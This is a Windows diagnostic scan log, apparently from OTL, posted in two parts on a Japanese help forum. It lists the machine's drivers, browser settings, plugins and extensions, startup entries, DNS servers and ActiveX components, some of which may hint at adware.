DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/07/17 18:12:08 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,062,776 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDVDisk.sys -- (mwlPSDVDisk)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,022,648 | ---- | M] (Egis Technology Inc.) [File_System | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDFilter.sys -- (mwlPSDFilter)
DRV:[b]64bit:[/b] - [2012/06/20 12:05:07 | 000,020,520 | ---- | M] (Egis Technology Inc.) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\mwlPSDNserv.sys -- (mwlPSDNServ)
DRV:[b]64bit:[/b] - [2012/06/01 17:35:58 | 000,083,576 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiSDa.sys -- (bScsiSDa)
DRV:[b]64bit:[/b] - [2012/03/27 11:09:54 | 014,748,416 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:[b]64bit:[/b] - [2012/03/07 22:48:20 | 000,238,384 | ---- | M] (ELAN Microelectronics Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ETD.sys -- (ETD)
DRV:[b]64bit:[/b] - [2012/03/01 15:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:[b]64bit:[/b] - [2012/02/22 12:29:46 | 000,100,912 | ---- | M] (McAfee, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mferkdet.sys -- (mferkdet)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,018,432 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NTIDrvr.sys -- (NTIDrvr)
DRV:[b]64bit:[/b] - [2012/02/07 15:03:06 | 000,017,408 | ---- | M] (NTI Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\UBHelper.sys -- (UBHelper)
DRV:[b]64bit:[/b] - [2012/02/01 16:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:[b]64bit:[/b] - [2012/01/20 16:14:34 | 000,016,128 | ---- | M] (Intel(R) Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\TurboB.sys -- (TurboB)
DRV:[b]64bit:[/b] - [2012/01/19 00:30:42 | 000,435,240 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)
DRV:[b]64bit:[/b] - [2011/12/06 20:23:08 | 000,331,264 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:38 | 000,019,496 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdmp.sys -- (b57xdmp)
DRV:[b]64bit:[/b] - [2011/11/04 10:21:36 | 000,068,648 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57xdbd.sys -- (b57xdbd)
DRV:[b]64bit:[/b] - [2011/09/02 14:36:58 | 000,051,752 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\bScsiMSa.sys -- (bScsiMSa)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:[b]64bit:[/b] - [2011/07/14 16:32:23 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,109,056 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
DRV:[b]64bit:[/b] - [2010/11/21 12:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:[b]64bit:[/b] - [2009/11/24 09:38:00 | 000,016,008 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGVirHid.sys -- (LGVirHid)
DRV:[b]64bit:[/b] - [2009/11/24 09:37:50 | 000,022,408 | ---- | M] (Logitech Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\LGBusEnum.sys -- (LGBusEnum)
DRV:[b]64bit:[/b] - [2009/07/14 10:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:[b]64bit:[/b] - [2009/07/14 10:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:[b]64bit:[/b] - [2009/07/14 10:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:[b]64bit:[/b] - [2009/06/11 05:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:[b]64bit:[/b] - [2009/06/11 05:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:[b]64bit:[/b] - [2009/03/18 17:35:42 | 000,033,856 | -H-- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\hamachi.sys -- (hamachi)
DRV - [2009/07/14 10:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&form=AARTDF&pc=MAAR&src=IE-SearchBox


IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0



IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ja-jp/?ocid=iehp
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = ja-JP
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes,DefaultScope = {C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.startup.homepage: "about:home"
FF - prefs.js..extensions.BU9VxlWSf7xOHT97.scode: …
  • あすとろ
  • 2015/09/12 (Sat) 23:41:05
OTL2
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll File not found
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF:[b]64bit:[/b] - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.4.0: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@esn/npbattlelog,version=2.6.2: C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll (EA Digital Illusions CE AB)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=11.60.2: C:\Program Files (x86)\Java\jre1.8.0_60\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.co.jp/NxGame: C:\ProgramData\NexonJP\NGM\npNxGameJP.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\【ユーザー名】\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 37.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins

[2015/02/17 13:17:40 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Extensions
[2015/09/07 23:12:55 | 000,000,000 | ---D | M] (No name found) -- C:\Users\【ユーザー名】\AppData\Roaming\mozilla\Firefox\Profiles\i4n38c5y.default\extensions
[2015/09/07 23:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2015/09/07 23:15:10 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

[color=#E56717]========== Chrome ==========[/color]

CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.7_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.9.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.30_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\eablgejicbklomgaiclcolfilbkckngf\1.2.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpkfjicglakibpenojifdiepckckakgk\1.13.4_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbpblocgmgfnpjjppndjkmgjaogfceg\0.98.80_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.1.2.0_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\plnacehkknmafkjgkikclamogikoiaaa\1.1_0\

O1 HOSTS File: ([2015/06/14 18:09:04 | 000,000,855 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
O2:[b]64bit:[/b] - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll (Oracle Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [ETDCtrl] C:\Program Files\Elantech\ETDCtrl.exe (ELAN Microelectronics Corp.)
O4:[b]64bit:[/b] - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [IntelTBRunOnce] wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs" File not found
O4:[b]64bit:[/b] - HKLM..\Run: [Launch LCore] C:\Program Files\Logicool Gaming Software\LCore.exe (Logitech Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [Logitech Download Assistant] C:\Windows\SysNative\LogiLDA.dll (Logitech, Inc.)
O4:[b]64bit:[/b] - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit:[/b] - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKLM..\Run: [BackupManagerTray] C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)
O4 - HKLM..\Run: [Google Japanese Input Prelauncher] C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe (Google Inc.)
O4 - HKLM..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe (Dritek System Inc.)
O4 - HKLM..\Run: [SuiteTray] C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe (Egis Technology Inc.)
O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd)
O4 - HKU\S-1-5-21-2268393351-900118556-74167924-1000..\Run: [Dropbox Update] C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe (Dropbox, Inc.)
O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found
O4 - Startup: C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O9:[b]64bit:[/b] - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O10:[b]64bit:[/b] - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:[/b] - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: DhcpNameServer = 192.168.50.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18:[b]64bit:[/b] - Protocol\Handler\livecall - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\msnim - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:[/b] - Protocol\Handler\wlmailhtml - No CLSID value found
O18:[b]64bit:[/b] - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:[/b] - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:[/b] - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{2558c854-d459-11e3-a87a-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{37963c8e-b209-11e4-9d99-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{617f691c-d6a3-11e3-b617-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell - "" = AutoRun
O33 - MountPoints2\{abdeda0d-d52d-11e3-b8ba-208984cf2c64}\Shell\AutoRun\command - "" = E:\setup.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit:[/b] - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit:[/b] - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit:[/b] - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

ActiveX:[b]64bit:[/b] {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\system32\ieudinit.exe
ActiveX:[b]64bit:[/b] {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX:[b]64bit:[/b] {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX:[b]64bit:[/b] {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX:[b]64bit:[/b] {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX:[b]64bit:[/b] {2D46B6DC-2207-486B-B523-A557E6D54B47} - C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:[b]64bit:[/b] {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -BaseSettings
ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX:[b]64bit:[/b] {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
